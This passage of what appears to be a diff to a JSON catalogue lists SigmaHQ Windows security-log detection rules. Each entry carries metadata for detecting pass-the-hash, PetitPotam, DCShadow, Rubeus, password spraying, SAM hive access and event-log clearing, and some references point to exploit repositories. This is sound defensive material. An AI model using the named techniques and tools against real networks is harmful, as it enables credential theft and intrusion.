"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2020/06/27", - "filename": "win_security_not_allowed_rdp_access.yml", - "author": "Pushkarev Dmitry", - "level": "medium", - "falsepositive": [ - "Valid user was not added to RDP group" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "value": "Successful Overpass the Hash Attempt", - "meta": { - "refs": [ - "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" - ], - "creation_date": "2018/02/12", - "filename": "win_security_overpass_the_hash.yml", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", - "level": "high", - "falsepositive": [ - "Runas command-line tool using /netonly parameter" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "value": "Pass the Hash Activity 2", - "meta": { - "refs": [ - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", - "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", - "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "creation_date": "2019/06/14", - "filename": "win_security_pass_the_hash_2.yml", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", - "level": "medium", - "falsepositive": [ - "Administrator activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect PetitPotam coerced authentication activity.", - "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "value": "Possible PetitPotam Coerce Authentication Attempt", - "meta": { - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ], - "creation_date": "2021/09/02", - "filename": "win_security_petitpotam_network_share.yml", - "author": "Mauricio Velazco, Michael Haag", - "level": "high", - "falsepositive": [ - "Unknown. Feedback welcomed." 
- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", - "value": "PetitPotam Suspicious Kerberos TGT Request", - "meta": { - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ], - "creation_date": "2021/09/02", - "filename": "win_security_petitpotam_susp_tgt_request.yml", - "author": "Mauricio Velazco, Michael Haag", - "level": "high", - "falsepositive": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects DCShadow via create new SPN", - "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", - "value": "Possible DC Shadow Attack", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1207" - ], - "creation_date": "2019/10/25", - "filename": "win_security_possible_dc_shadow.yml", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", - "level": "medium", - "falsepositive": [ - "Valid on domain controllers; exclude known DCs" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell script installed as a Service", - "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", - "value": "PowerShell Scripts Installed as Services - Security", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "win_security_powershell_script_installed_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects access to a protected_storage service over 
the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", - "value": "Protected Storage Service Access", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2019/08/10", - "filename": "win_security_protected_storage_service_access.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", - "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", - "value": "Rare Schtasks Creations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "car.2013-08-001", - "attack.t1053.005" - ], - "creation_date": "2017/03/23", - "filename": "win_security_rare_schtasks_creations.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Software installation", - "Software updates" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "uuid": "8400629e-79a9-4737-b387-5db940ab2367", - "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "meta": { - "refs": [ - 
"https://twitter.com/AdamTheAnalyst/status/1134394070045003776", - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "creation_date": "2019/06/02", - "filename": "win_security_rdp_bluekeep_poc_scanner.yml", - "author": "Florian Roth (rule), Adam Bradbury (idea)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "RDP login with localhost source address may be a tunnelled login", - "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", - "value": "RDP Login from Localhost", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" - ], - "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" - ], - "creation_date": "2019/01/28", - "filename": "win_security_rdp_localhost_login.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", - "value": "RDP over Reverse SSH Tunnel WFP", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2019/02/16", - "filename": "win_security_rdp_reverse_tunnel.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Programs that connect locally to the RDP port" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "value": "Register new Logon Process by Rubeus", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ], - "creation_date": "2019/10/24", - "filename": "win_security_register_new_logon_process_by_rubeus.yml", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "value": "Remote PowerShell Sessions Network Connections (WinRM)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": 
"win_security_remote_powershell_session.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Legitimate use of remote PowerShell execution" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", - "value": "Replay Attack Detected", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_replay_attack_detected.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "value": "Suspicious Computer Account Name Change CVE-2021-42287", - "meta": { - "refs": [ - "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/22", - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", - "author": "Florian Roth", - "level": "high", - 
"falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects handles requested to SAM registry hive", - "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "value": "SAM Registry Hive Handle Request", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" - ], - "creation_date": "2019/08/12", - "filename": "win_security_sam_registry_hive_handle_request.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. 
\\TASKNAME", - "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", - "value": "Scheduled Task Deletion", - "meta": { - "refs": [ - "https://twitter.com/matthewdunwoody/status/1352356685982146562", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" - ], - "creation_date": "2021/01/22", - "filename": "win_security_scheduled_task_deletion.yml", - "author": "David Strassegger, Tim Shelton", - "level": "low", - "falsepositive": [ - "Software installation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-system users failing to get a handle of the SCM database.", - "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "value": "SCM Database Handle Failure", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1010" - ], - "creation_date": "2019/08/12", - "filename": "win_security_scm_database_handle_failure.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-system users performing privileged operation os the SCM database", - "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", - "value": "SCM Database Privileged Operation", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2019/08/15", - "filename": "win_security_scm_database_privileged_operation.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", - "value": "Remote WMI ActiveScriptEventConsumers", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2020/09/02", - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "SCCM" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "value": "Service Installed By Unusual Client - Security", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://twitter.com/SBousseaden/status/1490608838701166596", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/09/15", - "filename": "win_security_service_installation_by_unusal_client.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "security", - "logsource.product": "windows" - } - }, - { - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", - "value": "SMB Create Remote File Admin Share", - "meta": { - "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", - "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/08/06", - "filename": "win_security_smb_file_creation_admin_shares.yml", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", - "value": "Addition of Domain Trusts", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2019/12/03", - "filename": "win_security_susp_add_domain_trust.yml", - "author": 
"Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Legitimate extension of domain structure" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "value": "Addition of SID History to Active Directory Object", - "meta": { - "refs": [ - "https://adsecurity.org/?p=1772", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1134.005" - ], - "creation_date": "2017/02/19", - "filename": "win_security_susp_add_sid_history.yml", - "author": "Thomas Patzke, @atc_project (improvements)", - "level": "medium", - "falsepositive": [ - "Migration of an account into a new domain" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Code integrity failures may indicate tampered executables.", - "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "value": "Failed Code Integrity Checks", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ], - "creation_date": "2019/12/03", - "filename": "win_security_susp_codeintegrity_check_failure.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Disk device errors" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", - "value": "Win Susp Computer Name Containing Samtheadmin", - "meta": { - "refs": [ - 
"https://twitter.com/malmoeb/status/1511760068743766026", - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", - "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" - ], - "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2022/09/09", - "filename": "win_security_susp_computer_name.yml", - "author": "elhoim", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "security", - "logsource.product": "windows" - } - }, - { - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "value": "Password Change on Directory Service Restore Mode (DSRM) Account", - "meta": { - "refs": [ - "https://adsecurity.org/?p=1714", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2017/02/19", - "filename": "win_security_susp_dsrm_password_change.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Initial installation of a domain controller" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "value": "Security Eventlog Cleared", - "meta": { - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2017/01/10", - "filename": "win_security_susp_eventlog_cleared.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", - "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", - "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_explicit_credentials.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established 
category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple accounts from a single process on the system.", - "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", - "value": "Multiple Users Failing to Authenticate from Single Process", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_process.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", - "value": "Failed Logins with Different Accounts from Single Source System", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2017/01/10", - "filename": "win_security_susp_failed_logons_single_source.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" 
- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", - "value": "Failed NTLM Logins with Different Accounts from Single Source System", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2017/01/10", - "filename": "win_security_susp_failed_logons_single_source2.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", - "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", - "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", - "author": "Mauricio Velazco, frack113", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix 
server farms" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", - "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", - "value": "Disabled Users Failing To Authenticate From Source Using Kerberos", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", - "author": "Mauricio Velazco, frack113", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", - "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", - "value": "Invalid Users Failing To Authenticate From Source Using Kerberos", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", - "author": "Mauricio Velazco, 
